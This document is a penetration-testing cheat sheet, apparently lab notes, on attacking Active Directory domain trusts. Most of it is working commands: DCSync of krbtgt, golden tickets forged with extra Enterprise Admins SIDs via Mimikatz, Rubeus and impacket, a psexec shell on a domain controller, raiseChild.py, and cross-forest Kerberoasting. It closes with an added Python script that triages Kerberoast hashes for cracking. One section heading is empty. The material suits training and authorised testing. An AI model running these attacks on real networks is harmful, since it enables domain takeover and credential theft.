# Domain Trust Enumeration

## Enumerate Domain Trusts (PowerView)

### Show Existing Trusts

```powershell
Get-DomainTrust
```

### Show Trust Mapping

```powershell
Get-DomainTrustMapping
```

### Show Users in the Child Domain

```powershell
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
```

## Attacking Domain Trusts - Child -> Parent (Windows)

To perform this attack after compromising a child domain, we need the following:

1. The KRBTGT NT hash for the child domain
2. The SID of the child domain
3. The name of a target user in the child domain (does not need to exist!)
4. The FQDN of the child domain
5. The SID of the Enterprise Admins group of the root domain (the root domain SID with the well-known RID 519 appended)

With this data collected, the attack can be performed with Mimikatz or Rubeus.

### 1 Obtaining KRBTGT NT Hash

```powershell
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
```

### 2 Obtaining SID Child Domain

```powershell
Get-DomainSID
```

### 3 Name Target User

```powershell
# Can be any username, even one that does not exist (the tickets below use "hacker")
```

### 4 FQDN Child Domain

```powershell
# SourceName is the child domain FQDN, TargetName the parent
Get-DomainTrust
```

### 5 SID Enterprise Admins Group

```powershell
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
```

### 6 Putting It All Together

```powershell
# Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Rubeus Way
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
```

### 7 Confirm Ticket

```powershell
# List Tickets
klist
```

### 8 DCsync

```powershell
# Mimikatz
# DCSync needs a target account; any account in the parent domain works, e.g. its krbtgt
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\krbtgt
```

## Attacking Domain Trusts - Child -> Parent (Linux)

We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:

1. The KRBTGT hash for the child domain
2. The SID for the child domain
3. The name of a target user in the child domain (does not need to exist!)
4. The FQDN of the child domain
5. The SID of the Enterprise Admins group of the root domain

#### 1 Get KRBTGT NT Hash

```bash
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
```

#### 2 Get SID Child Domain

```bash
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"
```

#### 3 Name Target User

```bash
# Can be any username, even one that does not exist (the ticket below uses "hacker")
```

#### 4 Get SID Enterprise Admins

```bash
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"
```

#### 5 Putting it all Together

```bash
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
```

#### 6 Export ccache

```bash
# ticketer.py writes the ticket to <username>.ccache in the current directory
export KRB5CCNAME=hacker.ccache
```

#### 7 Get Shell

```bash
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5
```

### Automatic Way

```bash
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
```

## Attacking Domain Trust - Cross-Forest (Windows)

### Cross-Forest Kerberoasting

```powershell
# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
```

### Admin Password Reuse & Group Membership

```powershell
# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

# Convert SID
Convert-SidToName <SID>

# Log in with the foreign account if it is a member of the target domain's Administrators group (or its password is reused there)
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
```

### SID History Abuse


## Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)

### Cross-Forest Kerberoasting

```bash
# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
```
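Both the Rubeus `/domain` and the `GetUserSPNs.py -target-domain` runs above return `$krb5tgs$` hashes whose realm field is the trusted forest, not our own, and whose encryption type decides how cheap they are to crack. The Python below is an added example, not code from this page or from Rubeus, impacket or hashcat; it parses both hash layouts (RC4 etype 23 and AES etypes 17/18), filters to tickets issued by a foreign realm, maps each to its hashcat mode, and orders RC4 first. The two sample hashes are constructed with dummy hex and the `backupsvc` account is assumed; only `mssqlsvc` and the domain names come from the notes.

```python
"""Triage cross-forest Kerberoast output. Added example; sample hashes are
constructed (dummy hex), not real ticket material."""
import re

HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}   # RC4-HMAC, AES128-CTS, AES256-CTS

# etype 23 layout:    $krb5tgs$23$*user$REALM$spn*$checksum(16 bytes)$edata
RC4_RE = re.compile(
    r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$")
# etype 17/18 layout: $krb5tgs$18$user$REALM$*spn*$checksum(12 bytes)$edata
AES_RE = re.compile(
    r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9a-f]{24})\$([0-9a-f]+)$")

# Constructed samples: realistic shape, meaningless hex bodies.
SAMPLE_RC4 = ("$krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$"
              "MSSQLSvc/sql01.freightlogistics.local:1433*$" + "a" * 32 + "$" + "b" * 64)
SAMPLE_AES = ("$krb5tgs$18$backupsvc$FREIGHTLOGISTICS.LOCAL$"
              "*http/web01.freightlogistics.local*$" + "c" * 24 + "$" + "d" * 64)


def parse_kerberoast(line: str) -> dict:
    """Split one $krb5tgs$ line into etype, account, realm, SPN and hashcat mode."""
    line = line.strip()
    m = RC4_RE.match(line)
    if m:
        user, realm, spn, _checksum, _edata = m.groups()
        etype = 23
    else:
        m = AES_RE.match(line)
        if not m:
            raise ValueError("not a recognised $krb5tgs$ hash: %r" % line[:40])
        etype_s, user, realm, spn, _checksum, _edata = m.groups()
        etype = int(etype_s)
    return {"etype": etype, "user": user, "realm": realm.upper(),
            "spn": spn, "hashcat_mode": HASHCAT_MODE[etype]}


def cross_forest(entries: list, home_realm: str) -> list:
    """Keep only tickets issued by a realm other than our own (the trusted forest)."""
    return [e for e in entries if e["realm"] != home_realm.upper()]


def crack_order(entries: list) -> list:
    """RC4 (etype 23) is far cheaper to brute-force than AES; queue it first."""
    return sorted(entries, key=lambda e: (e["etype"] != 23, e["user"]))


if __name__ == "__main__":
    parsed = [parse_kerberoast(h) for h in (SAMPLE_RC4, SAMPLE_AES)]
    for e in crack_order(cross_forest(parsed, "INLANEFREIGHT.LOCAL")):
        print("%-10s %-25s etype=%d hashcat -m %d  (%s)"
              % (e["user"], e["realm"], e["etype"], e["hashcat_mode"], e["spn"]))
```

When a target forest hands back only AES hashes, the account has `msDS-SupportedEncryptionTypes` restricting RC4; Rubeus can request an RC4 ticket explicitly only if the KDC still allows it, so the etype you see here is what you have to crack.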

